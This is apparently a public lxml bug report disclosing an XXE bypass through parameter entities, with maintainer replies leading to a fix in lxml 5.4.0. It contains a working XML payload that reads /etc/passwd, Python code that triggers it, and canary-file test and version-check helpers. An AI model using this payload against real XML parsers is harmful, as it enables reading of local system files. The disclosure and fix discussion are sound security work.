XXE resolve_entities bypass using Parameter Entity

Bug #2107279 reported by Anatoly Katyushin
This bug affects 1 person
Affects: lxml
Status: Fix Released
Importance: High
Assigned to: scoder

Bug Description

Since version 5.0.0, lxml restricts external entity (XXE) resolution by default and requires resolve_entities to be set explicitly to lift the restriction.
Thus the XML below
```
<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE msg [
        <!ENTITY xxe SYSTEM 'file:///etc/passwd'>
    ]>
<msg>&xxe;</msg>
```
will not be expanded unless resolve_entities is enabled:
```
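from lxml import etree

# Read the document as bytes so the encoding in the XML declaration is honoured.
with open('test.xml', 'rb') as f:
    xml_data = f.read()

# Default parser: resolve_entities is deliberately not passed.
parser = etree.XMLParser()
root = etree.fromstring(xml_data, parser=parser)

print(etree.tostring(root, pretty_print=True).decode())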
```

However, libxml2 does not restrict parameter entities, which still leads to XXE.

Thus the XML below
```
<?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE msg [
        <!ENTITY % a '
            <!ENTITY &#x25; file SYSTEM "/etc/passwd">
            <!ENTITY &#x25; b "<!ENTITY c &#x27;&#x25;file;&#x27;>">
        '>
        %a;
        %b;

]>
<msg>&c;</msg>
```
works fine.
I've tested on python:3.6 through python:3.12; this works with lxml 5.0.0 and up to 5.3.2.
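The reproduction above can be sketched without touching /etc/passwd, assuming a throwaway canary file is an acceptable stand-in. The names `MARKER`, `build_payload` and `leaks_via_parameter_entity` are hypothetical helpers introduced here for illustration, not part of lxml. The sketch assumes a temp-file path without `%`, `&` or quote characters, since the path is embedded in an entity value.

```python
import os
import tempfile

# Hypothetical canary text; any string free of <, & and quotes would do.
MARKER = "xxe-canary-2107279"


def build_payload(path):
    """Return the parameter-entity document from the report, pointed at `path`."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE msg [\n'
        "  <!ENTITY % a '\n"
        f'    <!ENTITY &#x25; file SYSTEM "{path}">\n'
        '    <!ENTITY &#x25; b "<!ENTITY c &#x27;&#x25;file;&#x27;>">\n'
        "  '>\n"
        '  %a;\n'
        '  %b;\n'
        ']>\n'
        '<msg>&c;</msg>\n'
    ).encode("utf-8")


def leaks_via_parameter_entity():
    """Return True if a default XMLParser expands the canary file into the tree."""
    # Imported lazily so build_payload() stays usable without lxml installed.
    from lxml import etree

    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(MARKER)
        path = f.name
    try:
        parser = etree.XMLParser()  # defaults only, resolve_entities not passed
        try:
            root = etree.fromstring(build_payload(path), parser=parser)
        except etree.XMLSyntaxError:
            return False  # the parser rejected the document, nothing leaked
        return MARKER in etree.tostring(root).decode()
    finally:
        os.unlink(path)

# Example: print(leaks_via_parameter_entity())
```

Whether the function returns True depends on the libxml2 version that the installed lxml uses, so no expected output is given here.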

Anatoly Katyushin (heart1ess) wrote :

I'd also like to request a CVE for this bug, if you don't mind.

scoder (scoder) wrote :

Thanks for reporting this.

As far as I can see, however, there is nothing specific to lxml in this exploit. It only depends on the libxml2 parser (and version). The binary wheels of lxml 5.3.x use libxml2 2.12.x, which allows this. The binary wheels of lxml 6.0 will come with libxml2 2.13.x (or maybe 2.14.x), which prevents this exploit.

Users of source builds or other binary distributions of lxml may or may not run into this, depending on the libxml2 version that they use. The system libxml2 shipped by the Linux distributions that I tried seems to be safe, for example.

So, I'm not sure this is worth a CVE by itself, given that libxml2 already fixed this last summer.
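Since the behaviour depends on the libxml2 version rather than on lxml itself, a quick check of the installed build might look like the sketch below. `etree.LXML_VERSION`, `etree.LIBXML_VERSION` and `etree.LIBXML_COMPILED_VERSION` are existing lxml attributes. The helper names and the 2.13.0 threshold are assumptions, taken only from the statement above that libxml2 2.13.x prevents the exploit.

```python
# Assumption: any libxml2 2.13.x or later blocks the exploit, as stated in this thread.
ASSUMED_FIXED_LIBXML2 = (2, 13, 0)


def libxml2_blocks_exploit(libxml2_version):
    """Compare a libxml2 version tuple against the assumed fixed version."""
    return tuple(libxml2_version) >= ASSUMED_FIXED_LIBXML2


def describe_installed_lxml():
    """Report the lxml and libxml2 versions of the current environment."""
    # Imported lazily so the pure version check works without lxml installed.
    from lxml import etree

    return {
        "lxml": etree.LXML_VERSION,
        "libxml2_runtime": etree.LIBXML_VERSION,
        "libxml2_compiled": etree.LIBXML_COMPILED_VERSION,
        "blocks_exploit": libxml2_blocks_exploit(etree.LIBXML_VERSION),
    }

# Example: print(describe_installed_lxml())
```

The runtime version is the one that matters for source builds linked against a system libxml2; for binary wheels the library is included statically, so both values should agree.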

Changed in lxml:
assignee: nobody → scoder (scoder)
importance: Undecided → Medium
milestone: none → 6.0
status: New → Opinion
Anatoly Katyushin (heart1ess) wrote :

I've been using the latest Python Docker images for testing, and it affects most of them (I'll check 3.13 a bit later). In this case it looks like containerized systems and projects that use lxml from 5.0 up to the current release are all vulnerable, which is why I think it is worth a CVE. I'll take a closer look at libxml2 next week to see whether they closed this bug on purpose or by accident.
Thanks for your answer.

Anatoly Katyushin (heart1ess) wrote :

Yep, so all Python images up to python:3.13 that use `pip install lxml` are vulnerable.

scoder (scoder) wrote :

It's not about the docker images. They all just download and install the binary wheels of lxml that come from PyPI. Those are vulnerable because they statically include and use libxml2 2.12.10 (2.11.9 on Windows).

So, yeah, it's lxml to blame for shipping these library versions. I'll see that I get a 5.3.3 release out that comes with the latest libxml2 2.13.8. lxml 6.0.0 is going to be too disruptive to require it for this kind of issue.

Changed in lxml:
importance: Medium → High
status: Opinion → Confirmed
scoder (scoder)
Changed in lxml:
milestone: 6.0 → 5.4.0
scoder (scoder) wrote :

I released lxml 5.4.0 with binary wheels that ship libxml2 2.13.8. That should resolve this issue.

Changed in lxml:
status: Confirmed → Fix Released
scoder (scoder) wrote :

Thank you for finding and reporting this issue.

information type: Private Security → Public Security
Anatoly Katyushin (heart1ess) wrote :

Great, I've checked: it now works only if resolve_entities is turned on =)
